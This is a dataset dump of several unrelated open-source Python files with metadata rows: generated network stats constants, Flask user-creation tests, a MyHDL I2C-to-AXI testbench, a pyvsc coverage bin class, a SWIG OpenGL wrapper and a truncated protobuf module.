prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("unknownPktsRcvdThr", prop)
prop = PropMeta("str", "unknownPktsRcvdTr", "unknownPktsRcvdTr", 48411, PropCategory.IMPLICIT_TREND)
prop.label = "Unknown Packets Received trend"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdTr", prop)
prop = PropMeta("str", "unknownPktsRcvdTrBase", "unknownPktsRcvdTrBase", 48410, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Unknown Packets Received trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdTrBase", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
a14bb37817d7bb4c8f4df5839311ba45d1fd581c | b30e399b7d687833126ebe4f5c8dd4ab49e2a5e7 | /tests/test_create_user.py | 3d1601cc2571d55b5034d477d3adc11f4ceda8fd | [] | no_license | riquellopes/desafio-python | ccd43101403349e5103499a59136c2e00d67d9af | f512923b7f4b0fa6f092f31693d4480a241849aa | refs/heads/master | 2021-01-17T17:16:28.486179 | 2016-10-10T12:40:22 | 2016-10-10T12:40:22 | 70,359,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,669 | py | import json
def test_should_be_returned_a_valid_dict(test_client, mocker):
os = mocker.patch("app.models.os")
os.environ.get.return_value = "desafio_python"
data = {
"name": "João da Silva",
"email": "[email protected]",
"password": "hunter2",
"phones": [{"number": "987654321", "ddd": "21"}]
}
response = test_client.post("/user", data=json.dumps(data), content_type='application/json')
assert response.status_code == 201
data = json.loads(response.data.decode('utf-8'))
assert "id" in data
assert "created" in data
assert "modified" in data
assert "last_login" in data
assert "token" in data
def test_should_be_returned_error_message(test_client, mocker):
os = mocker.patch("app.models.os")
os.environ.get.return_value = "desafio_python"
data = {
"name": "João da Silva",
"email": "[email protected]",
"password": "hunter2",
"phones": [{"number": "987654321", "ddd": "21"}]
}
response = test_client.post("/user", data=json.dumps(data), content_type='application/json')
assert response.status_code == 422
data = json.loads(response.data.decode('utf-8'))
assert data['mensagem'] == "E-mail já existente"
def test_should_be_get_error_message_when_no_data(test_client, mocker):
os = mocker.patch("app.models.os")
os.environ.get.return_value = "desafio_python"
response = test_client.post("/user", content_type='application/json')
assert response.status_code == 422
data = json.loads(response.data.decode('utf-8'))
assert data['mensagem'] == "Algumas informações não foram preenchidas."
| [
"[email protected]"
] | |
9c203851de27124bc30ae1fbbd530b8817b1f1ed | 4fa1acf1addaca8afa5c77ebde173af2f849eb2e | /tb/test_i2c_slave_axil_master.py | 2992353b6fe002d4238e5d0bceb50276cac474c3 | [
"MIT"
] | permissive | alexforencich/verilog-i2c | fb6ef3368cf595439d1b81b5080639bec0c71af7 | e7a26811e71de2bfa25ba704a1031c2bff9e5c31 | refs/heads/master | 2023-08-08T16:21:10.221616 | 2023-07-19T23:38:40 | 2023-07-19T23:38:40 | 19,449,788 | 389 | 151 | MIT | 2023-01-11T21:39:28 | 2014-05-05T08:49:01 | Verilog | UTF-8 | Python | false | false | 11,021 | py | #!/usr/bin/env python
"""
Copyright (c) 2019 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from myhdl import *
import os
import struct
import i2c
import axil
module = 'i2c_slave_axil_master'
testbench = 'test_%s' % module
srcs = []
srcs.append("../rtl/%s.v" % module)
srcs.append("../rtl/i2c_slave.v")
srcs.append("%s.v" % testbench)
src = ' '.join(srcs)
build_cmd = "iverilog -o %s.vvp %s" % (testbench, src)
def bench():
# Parameters
FILTER_LEN = 4
DATA_WIDTH = 32
ADDR_WIDTH = 16
STRB_WIDTH = (DATA_WIDTH/8)
# Inputs
clk = Signal(bool(0))
rst = Signal(bool(0))
current_test = Signal(intbv(0)[8:])
i2c_scl_i = Signal(bool(1))
i2c_sda_i = Signal(bool(1))
m_axil_awready = Signal(bool(0))
m_axil_wready = Signal(bool(0))
m_axil_bresp = Signal(intbv(0)[2:])
m_axil_bvalid = Signal(bool(0))
m_axil_arready = Signal(bool(0))
m_axil_rdata = Signal(intbv(0)[DATA_WIDTH:])
m_axil_rresp = Signal(intbv(0)[2:])
m_axil_rvalid = Signal(bool(0))
enable = Signal(bool(0))
device_address = Signal(intbv(0)[7:])
m_scl_i = Signal(bool(1))
m_sda_i = Signal(bool(1))
s2_scl_i = Signal(bool(1))
s2_sda_i = Signal(bool(1))
# Outputs
i2c_scl_o = Signal(bool(1))
i2c_scl_t = Signal(bool(1))
i2c_sda_o = Signal(bool(1))
i2c_sda_t = Signal(bool(1))
m_axil_awaddr = Signal(intbv(0)[ADDR_WIDTH:])
m_axil_awprot = Signal(intbv(0)[3:])
m_axil_awvalid = Signal(bool(0))
m_axil_wdata = Signal(intbv(0)[DATA_WIDTH:])
m_axil_wstrb = Signal(intbv(0)[STRB_WIDTH:])
m_axil_wvalid = Signal(bool(0))
m_axil_bready = Signal(bool(0))
m_axil_araddr = Signal(intbv(0)[ADDR_WIDTH:])
m_axil_arprot = Signal(intbv(0)[3:])
m_axil_arvalid = Signal(bool(0))
m_axil_rready = Signal(bool(0))
busy = Signal(bool(0))
bus_addressed = Signal(bool(0))
bus_active = Signal(bool(0))
m_scl_o = Signal(bool(1))
m_scl_t = Signal(bool(1))
m_sda_o = Signal(bool(1))
m_sda_t = Signal(bool(1))
s2_scl_o = Signal(bool(1))
s2_scl_t = Signal(bool(1))
s2_sda_o = Signal(bool(1))
s2_sda_t = Signal(bool(1))
# I2C master
i2c_master_inst = i2c.I2CMaster()
i2c_master_logic = i2c_master_inst.create_logic(
clk,
rst,
scl_i=m_scl_i,
scl_o=m_scl_o,
scl_t=m_scl_t,
sda_i=m_sda_i,
sda_o=m_sda_o,
sda_t=m_sda_t,
prescale=4,
name='master'
)
# I2C memory model 2
i2c_mem_inst2 = i2c.I2CMem(1024)
i2c_mem_logic2 = i2c_mem_inst2.create_logic(
scl_i=s2_scl_i,
scl_o=s2_scl_o,
scl_t=s2_scl_t,
sda_i=s2_sda_i,
sda_o=s2_sda_o,
sda_t=s2_sda_t,
abw=2,
address=0x51,
latency=0,
name='slave2'
)
# AXI4-Lite RAM model
axil_ram_inst = axil.AXILiteRam(2**16)
axil_ram_pause = Signal(bool(False))
axil_ram_port0 = axil_ram_inst.create_port(
clk,
s_axil_awaddr=m_axil_awaddr,
s_axil_awprot=m_axil_awprot,
s_axil_awvalid=m_axil_awvalid,
s_axil_awready=m_axil_awready,
s_axil_wdata=m_axil_wdata,
s_axil_wstrb=m_axil_wstrb,
s_axil_wvalid=m_axil_wvalid,
s_axil_wready=m_axil_wready,
s_axil_bresp=m_axil_bresp,
s_axil_bvalid=m_axil_bvalid,
s_axil_bready=m_axil_bready,
s_axil_araddr=m_axil_araddr,
s_axil_arprot=m_axil_arprot,
s_axil_arvalid=m_axil_arvalid,
s_axil_arready=m_axil_arready,
s_axil_rdata=m_axil_rdata,
s_axil_rresp=m_axil_rresp,
s_axil_rvalid=m_axil_rvalid,
s_axil_rready=m_axil_rready,
pause=axil_ram_pause,
name='port0'
)
# DUT
if os.system(build_cmd):
raise Exception("Error running build command")
dut = Cosimulation(
"vvp -m myhdl %s.vvp -lxt2" % testbench,
clk=clk,
rst=rst,
current_test=current_test,
i2c_scl_i=i2c_scl_i,
i2c_scl_o=i2c_scl_o,
i2c_scl_t=i2c_scl_t,
i2c_sda_i=i2c_sda_i,
i2c_sda_o=i2c_sda_o,
i2c_sda_t=i2c_sda_t,
m_axil_awaddr=m_axil_awaddr,
m_axil_awprot=m_axil_awprot,
m_axil_awvalid=m_axil_awvalid,
m_axil_awready=m_axil_awready,
m_axil_wdata=m_axil_wdata,
m_axil_wstrb=m_axil_wstrb,
m_axil_wvalid=m_axil_wvalid,
m_axil_wready=m_axil_wready,
m_axil_bresp=m_axil_bresp,
m_axil_bvalid=m_axil_bvalid,
m_axil_bready=m_axil_bready,
m_axil_araddr=m_axil_araddr,
m_axil_arprot=m_axil_arprot,
m_axil_arvalid=m_axil_arvalid,
m_axil_arready=m_axil_arready,
m_axil_rdata=m_axil_rdata,
m_axil_rresp=m_axil_rresp,
m_axil_rvalid=m_axil_rvalid,
m_axil_rready=m_axil_rready,
busy=busy,
bus_addressed=bus_addressed,
bus_active=bus_active,
enable=enable,
device_address=device_address
)
@always_comb
def bus():
# emulate I2C wired AND
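        # Each device either drives its line low or releases it, so taking
        # the AND of all outputs models open-drain lines with pull-ups.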
scl = m_scl_o & i2c_scl_o & s2_scl_o
sda = m_sda_o & i2c_sda_o & s2_sda_o
m_scl_i.next = scl;
m_sda_i.next = sda;
i2c_scl_i.next = scl
i2c_sda_i.next = sda
s2_scl_i.next = scl
s2_sda_i.next = sda
@always(delay(4))
def clkgen():
clk.next = not clk
@instance
def check():
yield delay(100)
yield clk.posedge
rst.next = 1
yield clk.posedge
rst.next = 0
yield clk.posedge
yield delay(100)
yield clk.posedge
# testbench stimulus
enable.next = 1
device_address.next = 0x50
yield clk.posedge
print("test 1: write")
current_test.next = 1
i2c_master_inst.init_write(0x50, b'\x00\x04'+b'\x11\x22\x33\x44')
yield i2c_master_inst.wait()
yield clk.posedge
while busy:
yield clk.posedge
data = axil_ram_inst.read_mem(0, 32)
for i in range(0, len(data), 16):
print(" ".join(("{:02x}".format(c) for c in bytearray(data[i:i+16]))))
assert axil_ram_inst.read_mem(4,4) == b'\x11\x22\x33\x44'
yield delay(100)
yield clk.posedge
print("test 2: read")
current_test.next = 2
i2c_master_inst.init_write(0x50, b'\x00\x04')
i2c_master_inst.init_read(0x50, 4)
yield i2c_master_inst.wait()
yield clk.posedge
data = i2c_master_inst.get_read_data()
assert data[0] == 0x50
assert data[1] == b'\x11\x22\x33\x44'
yield delay(100)
yield clk.posedge
print("test 3: various writes")
current_test.next = 3
for length in range(1,9):
for offset in range(4):
i2c_master_inst.init_write(0x50, bytearray(struct.pack('>H', 256*(16*offset+length)+offset)+b'\x11\x22\x33\x44\x55\x66\x77\x88'[0:length]))
yield i2c_master_inst.wait()
yield clk.posedge
while busy:
yield clk.posedge
data = axil_ram_inst.read_mem(256*(16*offset+length), 32)
for i in range(0, len(data), 16):
print(" ".join(("{:02x}".format(c) for c in bytearray(data[i:i+16]))))
assert axil_ram_inst.read_mem(256*(16*offset+length)+offset,length) == b'\x11\x22\x33\x44\x55\x66\x77\x88'[0:length]
yield delay(100)
yield clk.posedge
print("test 4: various reads")
current_test.next = 4
for length in range(1,9):
for offset in range(4):
i2c_master_inst.init_write(0x50, bytearray(struct.pack('>H', 256*(16*offset+length)+offset)))
i2c_master_inst.init_read(0x50, length)
yield i2c_master_inst.wait()
yield clk.posedge
data = i2c_master_inst.get_read_data()
assert data[0] == 0x50
assert data[1] == b'\x11\x22\x33\x44\x55\x66\x77\x88'[0:length]
yield delay(100)
# TODO various reads and writes
# yield clk.posedge
# print("test 3: read with delays")
# current_test.next = 3
# i2c_master_inst.init_write(0x50, b'\x00\x04')
# i2c_master_inst.init_read(0x50, 4)
# data_source.send(b'\x11\x22\x33\x44')
# data_source_pause.next = True
# data_sink_pause.next = True
# yield delay(5000)
# data_sink_pause.next = False
# yield delay(2000)
# data_source_pause.next = False
# yield i2c_master_inst.wait()
# yield clk.posedge
# data = None
# while not data:
# yield clk.posedge
# data = data_sink.recv()
# assert data.data == b'\x00\x04'
# data = i2c_master_inst.get_read_data()
# assert data[0] == 0x50
# assert data[1] == b'\x11\x22\x33\x44'
# yield delay(100)
yield clk.posedge
print("test 4: access slave 2")
current_test.next = 4
i2c_master_inst.init_write(0x51, b'\x00\x04'+b'\x11\x22\x33\x44')
yield i2c_master_inst.wait()
yield clk.posedge
data = i2c_mem_inst2.read_mem(0, 32)
for i in range(0, len(data), 16):
print(" ".join(("{:02x}".format(c) for c in bytearray(data[i:i+16]))))
assert i2c_mem_inst2.read_mem(4,4) == b'\x11\x22\x33\x44'
i2c_master_inst.init_write(0x51, b'\x00\x04')
i2c_master_inst.init_read(0x51, 4)
yield i2c_master_inst.wait()
yield clk.posedge
data = i2c_master_inst.get_read_data()
assert data[0] == 0x51
assert data[1] == b'\x11\x22\x33\x44'
yield delay(100)
raise StopSimulation
return instances()
def test_bench():
sim = Simulation(bench())
sim.run()
if __name__ == '__main__':
print("Running test...")
test_bench()
| [
"[email protected]"
] | |
a95da837fce67b1869d7911c2f64fee0ab6ed7c8 | ee8c4c954b7c1711899b6d2527bdb12b5c79c9be | /assessment2/amazon/run/core/controllers/file.py | 61d9b400b2ea8cc711774fd99be3523dd691a551 | [] | no_license | sqlconsult/byte | 02ac9899aebea4475614969b594bfe2992ffe29a | 548f6cb5038e927b54adca29caf02c981fdcecfc | refs/heads/master | 2021-01-25T14:45:42.120220 | 2018-08-11T23:45:31 | 2018-08-11T23:45:31 | 117,135,069 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | #!/usr/bin/env python3
from flask import Blueprint, Flask, render_template, request, url_for
controller = Blueprint('file', __name__, url_prefix='/file')
# @controller.route('/<string:title>', methods=['GET'])
# def lookup(title):
# if title == 'Republic': # TODO 2
# return render_template('republic.html') # TODO 2
# else:
# pass
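# A minimal working sketch of the route commented out above. It assumes a
# 'republic.html' template exists (per the TODO notes); this is a hypothetical
# completion kept below the original scaffold rather than replacing it.
@controller.route('/<string:title>', methods=['GET'])
def lookup(title):
    if title == 'Republic':
        return render_template('republic.html')
    return 'Not found', 404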
| [
"[email protected]"
] | |
a116dd620bfbb78a14a50120bf42574e606bcb13 | 13d222bc3332378d433835914da26ed16b583c8b | /tests/challenge22/test_challenge22.py | 4c076071ad9cc1c5e1409177a3652cf2a89fe86f | [] | no_license | mattjhussey/pemjh | c27a09bab09cd2ade31dc23fffac07374bea9366 | 2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99 | refs/heads/master | 2023-04-16T03:08:59.390698 | 2023-04-08T10:54:00 | 2023-04-08T10:54:00 | 204,912,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | """ Tests for challenge22 """
from os.path import abspath, dirname, join
from robber import expect
from pemjh.challenge22 import main
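# Challenge 22 is Project Euler's "Names scores" problem; 871198282 matches
# the well-known result for the standard names.txt input used here.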
def test_challenge22():
""" Regression testing challenge22 """
name_path = join(dirname(abspath(__file__)), 'names.txt')
with open(name_path, 'r') as name_file:
raw_names = [s.strip() for s in name_file.readlines()]
expect(main(raw_names)).to.eq(871198282)
| [
"[email protected]"
] | |
882eec1a180e7b4c69a1f2fb3cb0584d6a0baf0e | 3f554f2e0ef235d93ecbcbbb2e21132f15ef12fd | /venv/Scripts/easy_install-3.7-script.py | 68156d82a29ee68c2cabcd729c8d29ce9a4302ae | [] | no_license | sanii-muthui/password_locker | 189bb72389734cf59b11f27cf0c71d8d9dc4685a | b82ac4e87cc3301827d744f5e346a2737a959262 | refs/heads/master | 2022-01-09T08:04:37.240307 | 2019-07-22T09:56:20 | 2019-07-22T09:56:20 | 198,190,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | #!C:\Users\sanii\Desktop\password_locker\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"[email protected]"
] | |
636f08c92eda47b8eba96db768288a07393f0e21 | c54f5a7cf6de3ed02d2e02cf867470ea48bd9258 | /pyobjc/PyOpenGL-2.0.2.01/src/shadow/GL.EXT.separate_specular_color.0001.py | f61d2a53884bbcb6d4af41077bbd00d3c40380d1 | [] | no_license | orestis/pyobjc | 01ad0e731fbbe0413c2f5ac2f3e91016749146c6 | c30bf50ba29cb562d530e71a9d6c3d8ad75aa230 | refs/heads/master | 2021-01-22T06:54:35.401551 | 2009-09-01T09:24:47 | 2009-09-01T09:24:47 | 16,895 | 8 | 5 | null | null | null | null | UTF-8 | Python | false | false | 1,857 | py | # This file was created automatically by SWIG.
# Don't modify this file, modify the SWIG interface instead.
# This file is compatible with both classic and new-style classes.
import _separate_specular_color
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "this"):
if isinstance(value, class_type):
self.__dict__[name] = value.this
if hasattr(value,"thisown"): self.__dict__["thisown"] = value.thisown
del value.thisown
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static) or hasattr(self,name) or (name == "thisown"):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError,name
import types
try:
_object = types.ObjectType
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
del types
__version__ = _separate_specular_color.__version__
__date__ = _separate_specular_color.__date__
__api_version__ = _separate_specular_color.__api_version__
__author__ = _separate_specular_color.__author__
__doc__ = _separate_specular_color.__doc__
GL_LIGHT_MODEL_COLOR_CONTROL_EXT = _separate_specular_color.GL_LIGHT_MODEL_COLOR_CONTROL_EXT
GL_SINGLE_COLOR_EXT = _separate_specular_color.GL_SINGLE_COLOR_EXT
GL_SEPARATE_SPECULAR_COLOR_EXT = _separate_specular_color.GL_SEPARATE_SPECULAR_COLOR_EXT
glInitSeparateSpecularColorEXT = _separate_specular_color.glInitSeparateSpecularColorEXT
__info = _separate_specular_color.__info
| [
"ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25"
] | ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25 |
bb7116e666e458d7ef6f117d052ae161ef3c4f90 | 94b29d5cd65e5783692af9896ea9c983cf182c2f | /tests/utilities/test_apply_func_torchtext.py | ae919668a77ea9363c816014f05272341ca6622e | [
"Apache-2.0"
] | permissive | Programmer-RD-AI/pytorch-lightning | 5d4ab64a887d0ac7d47987241a3213ae59840616 | 02a675241c826d7720c7e15d6fda3f5da0b28116 | refs/heads/master | 2023-08-15T22:04:53.632338 | 2021-10-17T13:47:24 | 2021-10-17T13:47:24 | 413,277,562 | 3 | 0 | Apache-2.0 | 2021-10-04T04:49:55 | 2021-10-04T04:49:55 | null | UTF-8 | Python | false | false | 2,651 | py | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import torch
from pytorch_lightning.utilities.apply_func import move_data_to_device
from tests.helpers.imports import Dataset, Example, Field, Iterator
from tests.helpers.runif import RunIf
def _get_torchtext_data_iterator(include_lengths=False):
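    # Builds a tiny three-example dataset using the legacy torchtext
    # Field/Iterator API (re-exported via tests.helpers.imports); with
    # include_lengths=True each batch.text is a (data, lengths) tuple.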
text_field = Field(
sequential=True,
pad_first=False, # nosec
init_token="<s>",
eos_token="</s>", # nosec
include_lengths=include_lengths,
) # nosec
example1 = Example.fromdict({"text": "a b c a c"}, {"text": ("text", text_field)})
example2 = Example.fromdict({"text": "b c a a"}, {"text": ("text", text_field)})
example3 = Example.fromdict({"text": "c b a"}, {"text": ("text", text_field)})
dataset = Dataset([example1, example2, example3], {"text": text_field})
text_field.build_vocab(dataset)
iterator = Iterator(
dataset,
batch_size=3,
sort_key=None,
device=None,
batch_size_fn=None,
train=True,
repeat=False,
shuffle=None,
sort=None,
sort_within_batch=None,
)
return iterator, text_field
@pytest.mark.parametrize("include_lengths", [False, True])
@pytest.mark.parametrize("device", [torch.device("cuda", 0)])
@RunIf(min_gpus=1)
def test_batch_move_data_to_device_torchtext_include_lengths(include_lengths, device):
data_iterator, _ = _get_torchtext_data_iterator(include_lengths=include_lengths)
data_iter = iter(data_iterator)
batch = next(data_iter)
batch_on_device = move_data_to_device(batch, device)
if include_lengths:
# tensor with data
assert batch_on_device.text[0].device == device
# tensor with length of data
assert batch_on_device.text[1].device == device
else:
assert batch_on_device.text.device == device
@pytest.mark.parametrize("include_lengths", [False, True])
def test_batch_move_data_to_device_torchtext_include_lengths_cpu(include_lengths):
test_batch_move_data_to_device_torchtext_include_lengths(include_lengths, torch.device("cpu"))
| [
"[email protected]"
] | |
79321ece6462d20918c9ef544c17a191895225db | 8bb3bcf914860c20fb4a7163a8e0691cd802dd65 | /src/vsc/model/coverpoint_bin_single_val_model.py | 2c3d70c1f5e7480e7a886bb90d2225f0d2d90df9 | [
"Apache-2.0"
] | permissive | nitinm694/pyvsc | 8586cc2497f336289fecbfeb9e6dd788f4070b60 | 612de9e6244c685a3df1972e4860abfe35b614e1 | refs/heads/master | 2023-07-28T01:49:10.917496 | 2021-09-12T19:06:00 | 2021-09-12T19:06:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,961 | py |
# Created on Mar 20, 2020
#
# @author: ballance
from vsc.model.bin_expr_type import BinExprType
from vsc.model.coverpoint_bin_model_base import CoverpointBinModelBase
from vsc.model.expr_bin_model import ExprBinModel
from vsc.model.expr_literal_model import ExprLiteralModel
from vsc.model.rangelist_model import RangelistModel
class CoverpointBinSingleValModel(CoverpointBinModelBase):
def __init__(self, name, target_val : int):
super().__init__(name)
self.target_val = target_val
self.n_bins = 1
def finalize(self, bin_idx_base:int)->int:
super().finalize(bin_idx_base)
return 1
def get_bin_expr(self, bin_idx):
"""Builds expressions to represent the values in this bin"""
expr = ExprBinModel(
self.cp.target,
BinExprType.Eq,
ExprLiteralModel(self.target_val, False, 32)
)
return expr
def get_bin_name(self, bin_idx):
return self.name
def sample(self):
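        # A single-value bin hits only when the sampled coverpoint value
        # equals target_val; hit_bin_idx is 0 on a hit and -1 on a miss.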
val = self.cp.get_val()
if val == self.target_val:
self.hit_bin_idx = 0
self.cp.coverage_ev(self.bin_idx_base)
else:
self.hit_bin_idx = -1
return self.hit_bin_idx
def get_bin_range(self, idx):
print("get_bin_range: " + str(idx))
return RangelistModel([self.target_val])
def accept(self, v):
v.visit_coverpoint_bin_single(self)
def equals(self, oth)->bool:
eq = isinstance(oth, CoverpointBinSingleValModel)
if eq:
eq &= self.target_val == oth.target_val
return eq
def clone(self)->'CoverpointBinSingleValModel':
ret = CoverpointBinSingleValModel(self.name, self.target_val)
ret.srcinfo_decl = None if self.srcinfo_decl is None else self.srcinfo_decl.clone()
return ret
| [
"[email protected]"
] | |
fee13f3a06d66f223110454caf37abb36bc003b4 | b27658fa705c7b6ed3775479cfe960d5889b3669 | /src/pinyin_to_ipa/__init__.py | 73d55cc8f26cbb6a6e5fbf56f4f3f0de5a9c9535 | [
"MIT"
] | permissive | stefantaubert/pinyin-to-ipa | 46f08486461280ee26c951fe350d6fa1c6dcb79d | e8adabaead788fefb23794f62e237836beb3a8af | refs/heads/master | 2023-04-07T07:02:55.192113 | 2023-01-11T10:40:55 | 2023-01-11T10:40:55 | 585,899,687 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54 | py | from pinyin_to_ipa.transcription import pinyin_to_ipa
| [
"[email protected]"
] | |
140cfd85213aede01754e40979397ced1ec71108 | 45c142c3e3dc8d3211a86c77385ecfdd10d28fb9 | /dstore/engine/procedures/mi_ModifyApplicationParts_Ad_pb2.py | 075b058b0e690812b445b033b2dd1155d3dd3e45 | [] | no_license | dstore-io/dstore-sdk-python | 945d64995c8892af18fab26c90117245abec64a4 | 8494d12ac77c3c3cc6dd59026407ef514ad179fc | refs/heads/master | 2020-06-14T13:07:08.181547 | 2017-01-26T11:19:39 | 2017-01-26T11:19:39 | 75,177,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | true | 11,926 | py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: dstore/engine/procedures/mi_ModifyApplicationParts_Ad.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from dstore import values_pb2 as dstore_dot_values__pb2
from dstore.engine import engine_pb2 as dstore_dot_engine_dot_engine__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='dstore/engine/procedures/mi_ModifyApplicationParts_Ad.proto',
package='dstore.engine.mi_ModifyApplicationParts_Ad',
syntax='proto3',
serialized_pb=_b('\n;dstore/engine/procedures/mi_ModifyApplicationParts_Ad.proto\x12*dstore.engine.mi_ModifyApplicationParts_Ad\x1a\x13\x64store/values.proto\x1a\x1a\x64store/engine/engine.proto\"\x9a\x03\n\nParameters\x12\x38\n\x13\x61pplication_part_id\x18\x01 \x01(\x0b\x32\x1b.dstore.values.IntegerValue\x12!\n\x18\x61pplication_part_id_null\x18\xe9\x07 \x01(\x08\x12\x33\n\x0e\x61pplication_id\x18\x02 \x01(\x0b\x32\x1b.dstore.values.IntegerValue\x12\x1c\n\x13\x61pplication_id_null\x18\xea\x07 \x01(\x08\x12,\n\x07user_id\x18\x03 \x01(\x0b\x32\x1b.dstore.values.IntegerValue\x12\x15\n\x0cuser_id_null\x18\xeb\x07 \x01(\x08\x12\x34\n\x10\x61pplication_part\x18\x04 \x01(\x0b\x32\x1a.dstore.values.StringValue\x12\x1e\n\x15\x61pplication_part_null\x18\xec\x07 \x01(\x08\x12+\n\x06\x64\x65lete\x18\x05 \x01(\x0b\x32\x1b.dstore.values.BooleanValue\x12\x14\n\x0b\x64\x65lete_null\x18\xed\x07 